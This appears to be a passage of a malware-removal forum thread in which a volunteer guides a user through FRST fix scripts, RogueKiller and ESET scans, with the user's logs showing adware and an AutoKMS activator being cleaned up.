FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
12-02-2016 19:34:43 Windows Update
15-02-2016 13:41:32 Windows Backup
18-02-2016 15:21:16 Windows Update
21-02-2016 16:50:40 Windows Update
21-02-2016 19:00:07 Windows Backup
28-02-2016 19:00:09 Windows Backup
01-03-2016 12:19:24 Restore Point Created by FRST
01-03-2016 12:35:23 JRT Pre-Junkware Removal
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:48:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:35:24 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
System errors:
=============
Error: (03/01/2016 12:52:06 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.
Error: (03/01/2016 12:52:03 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.
Error: (03/01/2016 12:51:58 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.
Error: (03/01/2016 12:51:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.
Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.
Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.
Error: (03/01/2016 12:51:22 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.
Error: (03/01/2016 12:51:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.
Error: (03/01/2016 12:51:10 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.
Error: (03/01/2016 12:51:08 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.
CodeIntegrity:
===================================
Date: 2016-02-13 23:54:36.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.256
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.214
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.157
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.135
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.113
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:35.470
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:35.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:51:19.676
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:51:19.646
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
Percentage of memory in use: 21%
Total physical RAM: 16271.13 MB
Available physical RAM: 12742.79 MB
Total Virtual: 32655.13 MB
Available Virtual: 28445.88 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.69 GB) (Free:16.26 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.14 GB) NTFS
Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
C:\ProgramData\DP45977C.lfl
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
EmptyTemp:
Hosts:
End
Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~
Instructions on how to backup your Favourites/Bookmarks and other data can be found below.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xehzOq95.png.pagespeed.ic.1o1xpAkZbO.png Backup Internet Explorer Favourites (http://www.wikihow.com/Back-Up-Favorites-in-Internet-Explorer)
http://2-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xQlf57ne.png.pagespeed.ic.SnwgqhVB9v.jpg Backup Firefox Bookmarks (https://support.mozilla.org/en-US/kb/export-firefox-bookmarks-to-backup-or-transfer)
http://i.imgur.com/U5NwUGc.png Backup Chrome Bookmarks (http://www.wikihow.com/Export-Bookmarks-from-Chrome)
Proceed with the reset once done.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xehzOq95.png.pagespeed.ic.1o1xpAkZbO.png Internet Explorer: How to reset Internet Explorer settings (http://support.microsoft.com/kb/923737)
http://2-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xQlf57ne.png.pagespeed.ic.SnwgqhVB9v.jpg Firefox: Reset Firefox (https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-most-problems)
Chrome: Chrome - Reset browser settings (https://support.google.com/chrome/answer/3296214?hl=en)
~~~~~~~~~~~~~~~~~~~
Please remove any usb or external drives from the computer before you run this scan!
Please download RogueKiller and save it to your desktop.
You can check here (http://support.microsoft.com/kb/827218) if you're not sure if your computer is 32-bit or 64-bit
Download RogueKiller (http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe) to your desktop.
Quit all running programs.
For Windows XP, double-click to start.
For Vista,Windows 7/8, Right-click on the program and select Run as Administrator to start and when prompted allow it to run.[/*]
Read and accept the EULA (End User Licene Agreement)
Click Scan to scan the system.
When the scan completes Close the program > Don't Fix anything!
Don't run any other options, they're not all bad!!
Post back the report which should be located on your desktop.
~~~~~~~~~`
What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
Most reliable and thorough.
The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
This scanner can take quite a bit of time to run, depending of course how full your computer is.
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.
http://i.imgur.com/GzlsbnV.png ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.
Please download ESET Online Scan (http://download.eset.com/special/eos/esetsmartinstaller_enu.exe) and save the file to your Desktop.
Temporarily disable your anti-virus software. For instructions, please refer to the following link (http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/).
Double-click esetsmartinstaller_enu.exe to run the programme.
Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
Agree to the Terms of Use once more and click Start. Allow components to download.
Place a checkmark next to Enable detection of potentially unwanted applications.
Click Advanced settings. Place a checkmark next to:
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology
Ensure Remove found threats is unchecked.
Click Start.
Wait for the scan to finish. Please be patient as this can take some time.
Upon completion, click http://billy-oneal.com/Canned%20Speeches/speechimages/eset/esetListThreats.png. If no threats were found, skip the next two bullet points.
Click http://billy-oneal.com/Canned%20Speeches/speechimages/eset/esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
Push the Back button.
Place a checkmark next to http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xKN1w2nv.png.pagespeed.ic.JWqIaEgZi7.png and click http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/SzOC1p0.png.pagespeed.ce.OWDP45O6oG.png.
Re-enable your anti-virus software.
Copy the contents of the log and paste in your next reply.
Please post:
Fixlog.txt
RogueKiller.txt
ESET Online Scan.txt
kym.preston
2016-03-02, 09:21
In this last part you said, "Place a checkmark next to ? and click ?" the two images aren't loading or no longer exist. Would you be able to let me know another way?
Place a checkmark next to Uninstall the application on close, and click Finish.
kym.preston
2016-03-02, 12:19
Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-02 17:35:11) Run:3
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
C:\ProgramData\DP45977C.lfl
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
EmptyTemp:
Hosts:
End
*****************
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => not found.
C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => not found.
C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => not found.
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => not found.
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => not found.
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
idsvc => service not found.
wfpcapture => service not found.
wpcsvc => service not found.
"C:\WINDOWS\System32\Tasks\AutoKMS" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{025E3B95-A6D2-4C85-BD24-71C170E5A887} => key not found.
C:\WINDOWS\System32\Tasks\AutoKMS => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key not found.
"C:\ProgramData\DP45977C.lfl" => not found.
"C:\Users\Kym\AppData\Local\Temp\sqlite3.dll" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F27906F8-C2D3-459A-A01E-D551D7DB510D} => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => key not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
EmptyTemp: => 240.5 MB temporary data Removed.
The system needed a reboot.
==== End of Fixlog 17:35:14 ====
RogueKiller V11.0.14.0 [Feb 29 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 10 (10.0.10240) 64 bits version
Started in : Normal mode
User : Kym [Administrator]
Started from : C:\Users\Kym\Desktop\RogueKiller.exe
Mode : Scan -- Date : 03/02/2016 18:10:45
¤¤¤ Processes : 0 ¤¤¤
¤¤¤ Registry : 1 ¤¤¤
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Partner -> Found
¤¤¤ Tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ Hosts File : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0x0]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZRX-00A8LB0 SCSI Disk Device +++++
--- User ---
[MBR] c609e88a3e3a1eba81f6bd58da21a012
[BSP] 6de4e5b287547337ca290f55453cdbb2 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953766 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive1: Samsung SSD 840 EVO 120G SCSI Disk Device +++++
--- User ---
[MBR] 2414a722e2d20553db2407084ca6f557
[BSP] 5514a66c0c60dbc0c336179378e42b92 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive2: Generic- Multi-Card USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
C:\AdwCleaner\Quarantine\C\ProgramData\3c355888\4543324a.dll.vir a variant of Win32/Adware.Adposhel.A application
C:\FRST\Quarantine\C\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe.xBAD a variant of Win32/InstallCore.AFF.gen potentially unwanted application
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application
C:\WINDOWS\AutoKMS\AutoKMS.exe a variant of MSIL/HackKMS.H potentially unsafe application
kym.preston
2016-03-02, 12:27
Hi Juliet,
I just tried to open twitch.tv which was being massively spammed by ads before, and its working perfectly now. Im not sure if everything is fixed? Or if its only temporary.
I wont download any addons for chrome yet, il wait for your advice.
Thanks.
This last fix should fix any left overs, glad to hear things are good.
Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CreateRestorePoint:
CloseProcesses:
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe
C:\WINDOWS\AutoKMS\AutoKMS.exe
EmptyTemp:
End
Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
kym.preston
2016-03-03, 05:29
Fix result of Farbar Recovery Scan Tool (x64) Version:02-03-2016
Ran by Kym (2016-03-03 14:21:44) Run:4
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
